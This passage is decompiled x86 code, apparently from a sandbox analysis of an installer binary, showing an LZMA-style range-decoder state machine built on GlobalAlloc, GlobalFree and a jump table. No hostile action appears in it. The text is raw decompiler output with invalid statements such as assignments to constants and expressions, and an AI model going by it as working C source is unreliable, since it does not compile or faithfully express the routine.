              								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              								 *(_t613 - 0x40) = 1;
              								_t532 = _t531 - (_t531 >> 5);
              								 *_t606 = _t532;
              							} else {
              								 *(_t613 - 0x10) = _t565;
              								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              								 *_t606 = (0x800 - _t589 >> 5) + _t531;
              							}
              							if( *(_t613 - 0x10) >= 0x1000000) {
              								goto L139;
              							}
              							L137:
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 5;
              								L170:
              								_t568 = 0x22;
              								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
              								_t535 = 0;
              								L172:
              								return _t535;
              							}
              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              							L139:
              							_t533 =  *(_t613 - 0x84);
              							while(1) {
              								 *(_t613 - 0x88) = _t533;
              								while(1) {
              									L1:
              									_t534 =  *(_t613 - 0x88);
              									if(_t534 > 0x1c) {
              										break;
              									}
              									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              										case 0:
              											if( *(_t613 - 0x6c) == 0) {
              												goto L170;
              											}
              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              											_t534 =  *( *(_t613 - 0x70));
              											if(_t534 > 0xe1) {
              												goto L171;
              											}
              											_t538 = _t534 & 0x000000ff;
              											_push(0x2d);
              											asm("cdq");
              											_pop(_t570);
              											_push(9);
              											_pop(_t571);
              											_t609 = _t538 / _t570;
              											_t540 = _t538 % _t570 & 0x000000ff;
              											asm("cdq");
              											_t604 = _t540 % _t571 & 0x000000ff;
              											 *(_t613 - 0x3c) = _t604;
              											 *(_t613 - 0x1c) = (1 << _t609) - 1;
              											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
              											_t612 = (0x300 << _t604 + _t609) + 0x736;
              											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
              												L10:
              												if(_t612 == 0) {
              													L12:
              													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              													goto L15;
              												} else {
              													goto L11;
              												}
              												do {
              													L11:
              													_t612 = _t612 - 1;
              													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
              												} while (_t612 != 0);
              												goto L12;
              											}
              											if( *(_t613 - 4) != 0) {
              												GlobalFree( *(_t613 - 4));
              											}
              											_t534 = GlobalAlloc(0x40, 0x600); // executed
              											 *(_t613 - 4) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
              												goto L10;
              											}
              										case 1:
              											L13:
              											__eflags =  *(_t613 - 0x6c);
              											if( *(_t613 - 0x6c) == 0) {
              												 *(_t613 - 0x88) = 1;
              												goto L170;
              											}
              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              											_t45 = _t613 - 0x48;
              											 *_t45 =  *(_t613 - 0x48) + 1;
              											__eflags =  *_t45;
              											L15:
              											if( *(_t613 - 0x48) < 4) {
              												goto L13;
              											}
              											_t546 =  *(_t613 - 0x40);
              											if(_t546 ==  *(_t613 - 0x74)) {
              												L20:
              												 *(_t613 - 0x48) = 5;
              												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
              												goto L23;
              											}
              											 *(_t613 - 0x74) = _t546;
              											if( *(_t613 - 8) != 0) {
              												GlobalFree( *(_t613 - 8));
              											}
              											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
              											 *(_t613 - 8) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												goto L20;
              											}
              										case 2:
              											L24:
              											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
              											 *(_t613 - 0x84) = 6;
              											 *(_t613 - 0x4c) = _t553;
              											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
              											 *(_t613 - 0x54) = _t606;
              											goto L133;
              										case 3:
              											L21:
              											__eflags =  *(_t613 - 0x6c);
              											if( *(_t613 - 0x6c) == 0) {
              												 *(_t613 - 0x88) = 3;
              												goto L170;
              											}
              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              											_t67 = _t613 - 0x70;
              											 *_t67 =  &(( *(_t613 - 0x70))[1]);
              											__eflags =  *_t67;
              											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              											L23:
              											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
              											if( *(_t613 - 0x48) != 0) {
              												goto L21;
              											}
              											goto L24;
              										case 4:
              											L133:
              											_t531 =  *_t606;
              											_t589 = _t531 & 0x0000ffff;
              											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              											if( *(_t613 - 0xc) >= _t565) {
              												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              												 *(_t613 - 0x40) = 1;
              												_t532 = _t531 - (_t531 >> 5);
              												 *_t606 = _t532;
              											} else {
              												 *(_t613 - 0x10) = _t565;
              												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              												 *_t606 = (0x800 - _t589 >> 5) + _t531;
              											}
              											if( *(_t613 - 0x10) >= 0x1000000) {
              												goto L139;
              											}
              										case 5:
              											goto L137;
              										case 6:
              											__edx = 0;
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) = 1;
              												 *(__ebp - 0x84) = 7;
              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              												while(1) {
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											}
              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
              											__esi =  *(__ebp - 0x60);
              											__cl = 8;
              											__cl = 8 -  *(__ebp - 0x3c);
              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              											__ecx =  *(__ebp - 0x3c);
              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              											__ecx =  *(__ebp - 4);
              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              											__eflags =  *(__ebp - 0x38) - 4;
              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											if( *(__ebp - 0x38) >= 4) {
              												__eflags =  *(__ebp - 0x38) - 0xa;
              												if( *(__ebp - 0x38) >= 0xa) {
              													_t98 = __ebp - 0x38;
              													 *_t98 =  *(__ebp - 0x38) - 6;
              													__eflags =  *_t98;
              												} else {
              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              												}
              											} else {
              												 *(__ebp - 0x38) = 0;
              											}
              											__eflags =  *(__ebp - 0x34) - __edx;
              											if( *(__ebp - 0x34) == __edx) {
              												__ebx = 0;
              												__ebx = 1;
              												goto L61;
              											} else {
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__ecx =  *(__ebp - 8);
              												__ebx = 0;
              												__ebx = 1;
              												__al =  *((intOrPtr*)(__eax + __ecx));
              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              												goto L41;
              											}
              										case 7:
              											__eflags =  *(__ebp - 0x40) - 1;
              											if( *(__ebp - 0x40) != 1) {
              												__eax =  *(__ebp - 0x24);
              												 *(__ebp - 0x80) = 0x16;
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												__eax =  *(__ebp - 0x2c);
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xa;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              												__eax =  *(__ebp - 4);
              												__eax =  *(__ebp - 4) + 0x664;
              												__eflags = __eax;
              												 *(__ebp - 0x58) = __eax;
              												goto L69;
              											}
              											__eax =  *(__ebp - 4);
              											__ecx =  *(__ebp - 0x38);
              											 *(__ebp - 0x84) = 8;
              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              											while(1) {
              												 *(_t613 - 0x54) = _t606;
              												goto L133;
              											}
              										case 8:
              											goto L0;
              										case 9:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												goto L89;
              											}
              											__eflags =  *(__ebp - 0x60);
              											if( *(__ebp - 0x60) == 0) {
              												goto L171;
              											}
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											_t258 =  *(__ebp - 0x38) - 7 >= 0;
              											__eflags = _t258;
              											0 | _t258 = _t258 + _t258 + 9;
              											 *(__ebp - 0x38) = _t258 + _t258 + 9;
              											goto L75;
              										case 0xa:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xb;
              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              												while(1) {
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											}
              											__eax =  *(__ebp - 0x28);
              											goto L88;
              										case 0xb:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__ecx =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x20);
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              											} else {
              												__eax =  *(__ebp - 0x24);
              											}
              											__ecx =  *(__ebp - 0x28);
              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
              											L88:
              											__ecx =  *(__ebp - 0x2c);
              											 *(__ebp - 0x2c) = __eax;
              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              											L89:
              											__eax =  *(__ebp - 4);
              											 *(__ebp - 0x80) = 0x15;
              											__eax =  *(__ebp - 4) + 0xa68;
              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              											goto L69;
              										case 0xc:
              											L99:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xc;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t334 = __ebp - 0x70;
              											 *_t334 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t334;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											__eax =  *(__ebp - 0x2c);
              											goto L101;
              										case 0xd:
              											L37:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xd;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t122 = __ebp - 0x70;
              											 *_t122 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t122;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L39:
              											__eax =  *(__ebp - 0x40);
              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              												goto L48;
              											}
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												goto L54;
              											}
              											L41:
              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              											__ecx =  *(__ebp - 0x58);
              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              											 *(__ebp - 0x48) = __eax;
              											__eax = __eax + 1;
              											__eax = __eax << 8;
              											__eax = __eax + __ebx;
              											__esi =  *(__ebp - 0x58) + __eax * 2;
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edx = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												 *(__ebp - 0x40) = 1;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												__ebx = __ebx + __ebx + 1;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edx;
              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L39;
              											} else {
              												goto L37;
              											}
              										case 0xe:
              											L46:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t156 = __ebp - 0x70;
              											 *_t156 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t156;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											while(1) {
              												L48:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													break;
              												}
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t170 = __edx + 1; // 0x1
              													__ebx = _t170;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													continue;
              												} else {
              													goto L46;
              												}
              											}
              											L54:
              											_t173 = __ebp - 0x34;
              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              											__eflags =  *_t173;
              											goto L55;
              										case 0xf:
              											L58:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xf;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t203 = __ebp - 0x70;
              											 *_t203 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t203;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L60:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												L55:
              												__al =  *(__ebp - 0x44);
              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              												goto L56;
              											}
              											L61:
              											__eax =  *(__ebp - 0x58);
              											__edx = __ebx + __ebx;
              											__ecx =  *(__ebp - 0x10);
              											__esi = __edx + __eax;
              											__ecx =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												_t217 = __edx + 1; // 0x1
              												__ebx = _t217;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L60;
              											} else {
              												goto L58;
              											}
              										case 0x10:
              											L109:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x10;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t365 = __ebp - 0x70;
              											 *_t365 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t365;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											goto L111;
              										case 0x11:
              											L69:
              											__esi =  *(__ebp - 0x58);
              											 *(__ebp - 0x84) = 0x12;
              											while(1) {
              												 *(_t613 - 0x54) = _t606;
              												goto L133;
              											}
              										case 0x12:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 0x58);
              												 *(__ebp - 0x84) = 0x13;
              												__esi =  *(__ebp - 0x58) + 2;
              												while(1) {
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											}
              											__eax =  *(__ebp - 0x4c);
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											__eflags = __eax;
              											__eax =  *(__ebp - 0x58) + __eax + 4;
              											goto L130;
              										case 0x13:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												_t469 = __ebp - 0x58;
              												 *_t469 =  *(__ebp - 0x58) + 0x204;
              												__eflags =  *_t469;
              												 *(__ebp - 0x30) = 0x10;
              												 *(__ebp - 0x40) = 8;
              												L144:
              												 *(__ebp - 0x7c) = 0x14;
              												goto L145;
              											}
              											__eax =  *(__ebp - 0x4c);
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											 *(__ebp - 0x30) = 8;
              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              											L130:
              											 *(__ebp - 0x58) = __eax;
              											 *(__ebp - 0x40) = 3;
              											goto L144;
              										case 0x14:
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              											__eax =  *(__ebp - 0x80);
              											 *(_t613 - 0x88) = _t533;
              											goto L1;
              										case 0x15:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              											__al = __al & 0x000000fd;
              											__eax = (__eflags >= 0) - 1 + 0xb;
              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              											goto L120;
              										case 0x16:
              											__eax =  *(__ebp - 0x30);
              											__eflags = __eax - 4;
              											if(__eax >= 4) {
              												_push(3);
              												_pop(__eax);
              											}
              											__ecx =  *(__ebp - 4);
              											 *(__ebp - 0x40) = 6;
              											__eax = __eax << 7;
              											 *(__ebp - 0x7c) = 0x19;
              											 *(__ebp - 0x58) = __eax;
              											goto L145;
              										case 0x17:
              											L145:
              											__eax =  *(__ebp - 0x40);
              											 *(__ebp - 0x50) = 1;
              											 *(__ebp - 0x48) =  *(__ebp - 0x40);
              											goto L149;
              										case 0x18:
              											L146:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x18;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t484 = __ebp - 0x70;
              											 *_t484 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t484;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L148:
              											_t487 = __ebp - 0x48;
              											 *_t487 =  *(__ebp - 0x48) - 1;
              											__eflags =  *_t487;
              											L149:
              											__eflags =  *(__ebp - 0x48);
              											if( *(__ebp - 0x48) <= 0) {
              												__ecx =  *(__ebp - 0x40);
              												__ebx =  *(__ebp - 0x50);
              												0 = 1;
              												__eax = 1 << __cl;
              												__ebx =  *(__ebp - 0x50) - (1 << __cl);
              												__eax =  *(__ebp - 0x7c);
              												 *(__ebp - 0x44) = __ebx;
              												while(1) {
              													 *(_t613 - 0x88) = _t533;
              													goto L1;
              												}
              											}
              											__eax =  *(__ebp - 0x50);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              											__eax =  *(__ebp - 0x58);
              											__esi = __edx + __eax;
              											 *(__ebp - 0x54) = __esi;
              											__ax =  *__esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												__cx = __ax >> 5;
              												__eax = __eax - __ecx;
              												__edx = __edx + 1;
              												__eflags = __edx;
              												 *__esi = __ax;
              												 *(__ebp - 0x50) = __edx;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L148;
              											} else {
              												goto L146;
              											}
              										case 0x19:
              											__eflags = __ebx - 4;
              											if(__ebx < 4) {
              												 *(__ebp - 0x2c) = __ebx;
              												L119:
              												_t393 = __ebp - 0x2c;
              												 *_t393 =  *(__ebp - 0x2c) + 1;
              												__eflags =  *_t393;
              												L120:
              												__eax =  *(__ebp - 0x2c);
              												__eflags = __eax;
              												if(__eax == 0) {
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              													goto L170;
              												}
              												__eflags = __eax -  *(__ebp - 0x60);
              												if(__eax >  *(__ebp - 0x60)) {
              													goto L171;
              												}
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              												__eax =  *(__ebp - 0x30);
              												_t400 = __ebp - 0x60;
              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              												__eflags =  *_t400;
              												goto L123;
              											}
              											__ecx = __ebx;
              											__eax = __ebx;
              											__ecx = __ebx >> 1;
              											__eax = __ebx & 0x00000001;
              											__ecx = (__ebx >> 1) - 1;
              											__al = __al | 0x00000002;
              											__eax = (__ebx & 0x00000001) << __cl;
              											__eflags = __ebx - 0xe;
              											 *(__ebp - 0x2c) = __eax;
              											if(__ebx >= 0xe) {
              												__ebx = 0;
              												 *(__ebp - 0x48) = __ecx;
              												L102:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__eax = __eax + __ebx;
              													 *(__ebp - 0x40) = 4;
              													 *(__ebp - 0x2c) = __eax;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x644;
              													__eflags = __eax;
              													L108:
              													__ebx = 0;
              													 *(__ebp - 0x58) = __eax;
              													 *(__ebp - 0x50) = 1;
              													 *(__ebp - 0x44) = 0;
              													 *(__ebp - 0x48) = 0;
              													L112:
              													__eax =  *(__ebp - 0x40);
              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              														_t391 = __ebp - 0x2c;
              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
              														__eflags =  *_t391;
              														goto L119;
              													}
              													__eax =  *(__ebp - 0x50);
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              													__eax =  *(__ebp - 0x58);
              													__esi = __edi + __eax;
              													 *(__ebp - 0x54) = __esi;
              													__ax =  *__esi;
              													__ecx = __ax & 0x0000ffff;
              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
